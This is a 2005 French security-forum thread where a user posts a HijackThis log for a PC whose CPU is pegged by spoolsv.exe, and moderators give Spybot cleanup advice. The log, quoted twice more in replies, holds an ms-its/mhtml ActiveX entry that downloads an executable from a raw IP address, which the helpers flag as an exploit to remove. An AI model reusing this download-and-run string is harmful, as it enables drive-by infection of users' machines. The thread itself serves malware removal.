vérif du log car uc est à 100% à cause de spoolsv.exe [OK]

Sécurité et insécurité. Virus, Trojans, Spywares, Failles etc. …

Modérateur: Modérateurs et Modératrices

Règles du forum
Assiste.com a suspendu l'assistance à la décontamination après presque 15 ans sur l'ancien forum puis celui-ci. Voir :

Procédure de décontamination 1 - Anti-malware
Décontamination anti-malwares

Procédure de décontamination 2 - Anti-malware et antivirus (La Manip)
La Manip - Procédure standard de décontamination

Entretien périodique d'un PC sous Windows
Entretien périodique d'un PC sous Windows

Protection des navigateurs, de la navigation et de la vie privée
Protéger le navigateur, la navigation et la vie privée

vérif du log car uc est à 100% à cause de spoolsv.exe [OK]

Messagede nicodu85 » 04 Mar 2005, 13:51

bonjour à tous
je suis plutot débutant dans la bidouille informatique avant je laissais windows tout gérer
mais voilà mon pc tourne à 100% a cause de spoolsv.exe

j'ai fait plusieurs forums mais les gens ne donnent pas suite aux solutions proposées

j'ai essayé d'aller sur secuser mais ça s'ouvre pas alors que j'active les activex
j'ai essayé bitdefender en ligne (il n'a rien trouvé) (en + c'était long à cause de l'uc à 100%)
j'ai spybot sd et ad-aware perso
j'ai PCCILLIN12 (essai 1 mois) et avast (en quarantaine j'ai kernel32.dll winsock32.dll et wsock32.dll)

j'ai installé tuneup utilities
j'ai un AMD athlon(tm) XP2700+ 2166 MHz
mémoire 255Mo
windows XP édition famailiale (5.1.2600)
version IE 6.0.2900.2180

voici le log
Logfile of HijackThis v1.99.1
Scan saved at 13:48:25, on 04/03/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\RunDll32.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpohmr08.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\bin\hpoevm08.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\snmp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\Hewlett-Packard\Digital Imaging\Bin\hpoSTS08.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\PCCGUIDE.EXE
C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\HPZSTC07.EXE
C:\PROGRA~1\WinZip\winzip32.exe
C:\DOCUME~1\Nico\LOCALS~1\Temp\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://new-search.net/index.php?v=6&aff=0
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = htpp://www.unika.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page_bak = http://new-search.net/index.php?v=6&aff=0
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = ;localhost
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe irprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [Cmaudio] RunDll32 cmicnfg.cpl,CMICtrlWnd
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [pccguide.exe] "C:\Program Files\Trend Micro\Internet Security 12\pccguide.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - Global Startup: hp psc 1000 series.lnk = ?
O4 - Global Startup: hpoddt01.exe.lnk = ?
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~4\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Pages liées - res://c:\program files\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: Pages similaires - res://c:\program files\google\GoogleToolbar2.dll/cmsimilar.html
O8 - Extra context menu item: Version de la page actuelle disponible dans le cache Google - res://c:\program files\google\GoogleToolbar2.dll/cmcache.html
O9 - Extra button: Capturer ! - {47055D63-DFCD-11d3-8406-00500445A7D0} - C:\Program Files\Goto\MemoWeb 4\IEBtn\Launcher (file missing)
O9 - Extra 'Tools' menuitem: Capturer ce web - {47055D63-DFCD-11d3-8406-00500445A7D0} - C:\Program Files\Goto\MemoWeb 4\IEBtn\Launcher (file missing)
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O14 - IERESET.INF: START_PAGE_URL=htpp://www.unika.com
O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} - ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall Control) - http://a840.g.akamai.net/7/840/537/2004 ... scan53.cab
O16 - DPF: {80DD2229-B8E4-4C77-B72F-F22972D723EA} (AvxScanOnline Control) - http://www.bitdefender.com/scan/Msie/bitdefender.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab
O16 - DPF: {C36112BF-2FA3-4694-8603-3B510EA3B465} (Lycos File Upload Component) - http://f002.mail.caramail.lycos.fr/app/ ... loader.cab
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - Unknown owner - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Trend Micro Central Control Component (PcCtlCom) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\System32\HPZipm12.exe
O23 - Service: Trend Micro Real-time Service (Tmntsrv) - Trend Micro Incorporated. - C:\PROGRA~1\TRENDM~1\INTERN~1\Tmntsrv.exe
O23 - Service: Trend Micro Personal Firewall (TmPfw) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\TmPfw.exe
O23 - Service: Trend Micro Proxy Service (tmproxy) - Trend Micro Inc. - C:\PROGRA~1\TRENDM~1\INTERN~1\tmproxy.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2004\WinStylerThemeSvc.exe


si vous trouvez des erreurs , un grand merci
vive les forums :wink:



voici mon log
nicodu85
 
Messages: 9
Inscription: 04 Mar 2005, 13:23

Messagede Jim Rakoto » 04 Mar 2005, 14:41

Salut,

Voici analyse automatique du scan
http://hijackthis.de/logfiles/28118a66f ... 6c613.html

présence de new-search-net

O14 - IERESET.INF: START_PAGE_URL=htpp://www.unika.com
O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} - ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe
82.179.166.145 renvoie vers un site russe !

Pourrais-tu faire un nettoyage avec Spybot comme ceci :

Passer Spybot (mis à jour)
choisir Mode avançé ( à côté de Fichiers tout en haut > Mode)
> dans Outils > cocher toutes les cases :
Dans la colonne de gauche les cases cochées apparaissent sous forme de menu
Aller dans :
Outils > BHOs > supprimer ceux qui ne sont pas cochés en vert ou qui sont inconnus

Outils ActiveX > idem

Outils > pages navigateur > cocher les lignes inconnues, cliquer sur changer et choisir dans le menu déroulant About:blank (ceci va bloquer les pages IE anormales) celles avec Unika et new-search-net

Outils > effaceur de sécurité > aller dans "Modèles" > choisir : "ajouter fichiers du cache internet" (ce sont les fichiers temporaires dans lesquels se trouvent les spywares pour se relancer en permanence) > cliquer sur déchiqueter la liste qui apparaît

choisir ensuite toujours dans modèles : "ajouter les fichiers du dossier temp > cliquer à nouveau sur déchiqueter > tout se met avec un V en vert

Réglages > modules additionnels > cocher les deux cases Traceurs d'activité (tout en bas)

Il n'y a plus qu'à lancer Spybot pour vérifier !
cocher tout ce qu'il trouve, y compris les cases en vert et clic sur "corriger problèmes" .
Il devra terminer en relançant le PC.

Mesures préventives avec Spybot.

dans fichiers Hosts > sélectionner "ajouter fichiers Hosts (ceci va protéger contre des sites malveillants)

dans "Ajustements IE" > cocher la case devant : verrouiller le fichier Hosts.....

Toujours dans Outils, choisir "Résident" > cocher la case devant SDhelper

Vaccination > vacciner

Tout ceci en mode sans échec (tapoter F8 au démarrage ) et en ayant désactivé restauration système.
Panneau configuration > performances et maintenance > système > onglet restauration système > cocher la case " Désactiver"

On va voir ce que cela donne

A+
Mes configs Linux user #402189
Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
Avatar de l’utilisateur
Jim Rakoto
Modérateur
 
Messages: 6152
Inscription: 09 Mar 2004, 19:49
Localisation: Durbuy

réglages spybot avancés

Messagede nicodu85 » 04 Mar 2005, 15:46

merci pour les réglages

j'ai désactivé la restauration système
j'ai démarrer en mode sans échec avec réseau
j'ai eu comme page d edémarrage unika avec ie mais elle ne s'ouvrait pas.

j'ai tout fait
sauf
à pages du navigateur, j'ai juste transformé unika en about blank (il n'y avait pas new-search-net)
le reste je ne savais pas ce que c'était (y avait du microsoft, du google, du search...)

le test a donné après FELICITATIONS!

je n'ai pas coché les cases et corrigé les problèmes car il y a eu un message demandant si je voulais les enlever
et comme les noms (internet explorer , windows explorer ...) me paraissait bons je ne les ai pas corriger de peur de les enlever

je reste en ligne en mode sans échec
nicodu85
 
Messages: 9
Inscription: 04 Mar 2005, 13:23

Messagede Jim Rakoto » 04 Mar 2005, 15:52

Salut,

Il est intéressant de les supprimer car cela va nettoyer fichiers temporaires, cookies, etc.
C'est exprès que je te le proposais. nettoyer tous les traceurs.

A+
Mes configs Linux user #402189
Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
Avatar de l’utilisateur
Jim Rakoto
Modérateur
 
Messages: 6152
Inscription: 09 Mar 2004, 19:49
Localisation: Durbuy

Messagede nicodu85 » 04 Mar 2005, 16:34

c'est fait
je vais également faire les réglages d espybot sur l'autre pc que j'ai en réseau

PS: lorsque j'ai démarré en mode sans échec, windows a demandéd'ouvrir la session administrateur ou nico(moi)
j'ai cliqué administrateur.

après avoir corrigé 61 pb et ignorés 7

j'ai redémarré le pc en mode normal, spybot a démarré avant windows (même résultat et je n'ai pas encore osé corrigés les pb)
est ce que il faut que je les corrige en mode normal?

l'uc tourne tout le temps à 100% a cause de spoolsv.exe

est ce qu'il faut que je supprime des lignes avec hijackthis (j'ai jamais fait).

Encore merci pour tes réglages fins sur spybot :D
nicodu85
 
Messages: 9
Inscription: 04 Mar 2005, 13:23

Messagede Jim Rakoto » 04 Mar 2005, 17:16

Salut,

Oui, il faut laisser corriger tout. Il finit son nettoyage fin au démarrage.

Dans Spybot, outils > démarrage système > décocher toutes les lignes qui ne sont pas indispensables ou suspectes. (tu peux toujours réactiver en recochant simplement case et redémarrant PC)

Spoolserv.exe est un programme normal mais aussi signature de Backdoor.Ciadoor.B Trojan
Tu pourrais faire un scan des fichiers rundll32.exe (possible W32.Miroot.Worm) et spoolserv.exe dans windows\system32
avec Kaspersky
http://www.kaspersky.com/fr/scanforvirus

A+
Mes configs Linux user #402189
Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
Avatar de l’utilisateur
Jim Rakoto
Modérateur
 
Messages: 6152
Inscription: 09 Mar 2004, 19:49
Localisation: Durbuy

merci beaucoup

Messagede nicodu85 » 04 Mar 2005, 21:04

ok j'ai tout fait.
l'antivirus en ligne ne trouve rien
je l'avais déjà essayé

est ce qu'il faut que j'efface les lignes suspectes de mon log?

sinon pour mon uc à 100% ...ça me gave....si personne voit une solution
je finirai par tout formaté

merci pout ton attention
et bravo encore pour les réglages fins de spybot

PS: est ce que par hasard spoolsv.exe tournerait à fond parceque mon imprimante est partagée par réseau avec un autre pc?
nicodu85
 
Messages: 9
Inscription: 04 Mar 2005, 13:23

Messagede Jim Rakoto » 04 Mar 2005, 21:12

Re,

Un petit test avec ce petit utilitaire Currports version française en bas de page

http://www.nirsoft.net/utils/cports.html

l'explication réseau semble plausible

Currports te donnera l'adresse locale sur laquelle Spoolserv.exe se connecte.
192.168.0.** ou 192.168.1.**

si c'est sur une adresse distante > problème

A+
Mes configs Linux user #402189
Garder toujours son sens critique en éveil en utilisant le doute rationnel comme filtre de lecture.
Avatar de l’utilisateur
Jim Rakoto
Modérateur
 
Messages: 6152
Inscription: 09 Mar 2004, 19:49
Localisation: Durbuy

Messagede Invité » 05 Mar 2005, 01:07

tiens c'est bizarre spoolsv.exe n'apparait pas dans la liste de currports

est ce que désinstaller l'imprimante et la réinstaller peut être une solution?
autres propositions:
est ce que insérer le disque de windowsxp et demander une réparation marcherait
ou alors faire une restauration système?
je sais pas
Invité
 

Messagede pierre » 05 Mar 2005, 09:08

Bonjour,

Première remarque : mon antivirus n'aime pas ce fil de discussion. Après analyse, il bloque sur
Code: Tout sélectionner
O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} -

ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe

qui est qualifié de Bloodhound.Exploit.6

Comme l'a dit Jim - à virer

En ce qui concerne spoolsv.exe, il peut être légitime ou non.
Voici ce que l'on trouve dans la PacMan ( http://assiste.com.free.fr/p/pacman/lis ... ccueil.php )

Parasite : clock
Logiciel publicitaire LiveChat - les noms de fichier connus comprennent: mssetup.exe, kstatus.exe, spoolsv.exe, sptsupd.exe, osk.exe, msswchx.exe, netdde.exe, msbkup.exe

Parasite : load=
Ajouté par le trojan CIADOOR.B! Note - "Spoolsv.exe" se trouve dans le dossier Windows ou Winnt, et pas dans System32, comme le véritable fichier système Spoolsv.exe

Parasite : Print Spooler
Ajouté par le trojan CIADOOR.B! Note - "Spoolsv.exe" est dans le dossier Windows ou Winnt, et pas dans System32, comme le véritable fichier système Spoolsv.exe

Parasite : Spoolsv
Ajouté par le virus CIADOOR.121! Note - "Spoolsv.exe" est situé dans le répertoire Windows ou Winnt, et pas dans System32, comme le véritable fichier système Spoolsv.exe

Ton exécutable est dans C:\WINDOWS\system32\spoolsv.exe donc semblerait légitime.

Il y a très probablement un document en attente d'impression dans le spooler d'impression (le gestionnaire de la file d'attente à l'impression).

Supprimer le ou les documents en cours dans la file d'attente et tout devrait rentrer dans l'ordre.

Cet ordinateur est en réseau ? L'imprimante est partagée ? Non ? Alors :
Démarrer > Connexion (votre connexion) > Propriétés > Onglet "Gestion de réseau" > Décocher "Partage de fichiers et d'imprimantes pour les réseaux Microsoft"

Recommandation :
Utiliser Zeb Protect de notre ami Tesgaz
http://assiste.com.free.fr/p/internet_u ... rotect.php

Cordialement
Image
__________________
Pierre (aka Terdef)
Appel à donation - Le site a besoin de votre aide

Comment je me fais avoir/infecter ? - Protéger navigateur, navigation et vie privée - Bloquer publicité et surveillance sur le Web
Accélérer Windows - Accélérer Internet - Décontamination - Installer Malwarebytes - Forums d'entraide

Il ne sera répondu à aucune demande de dépannage posée en MP (Messagerie Privée). Les demandes doivent être publiques et les réponses doivent profiter au public.
Image
Avatar de l’utilisateur
pierre
 
Messages: 27883
Inscription: 20 Mai 2002, 23:01
Localisation: Ici et maintenant

Suivante

Retourner vers Sécurité (Contamination - Décontamination)

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 31 invités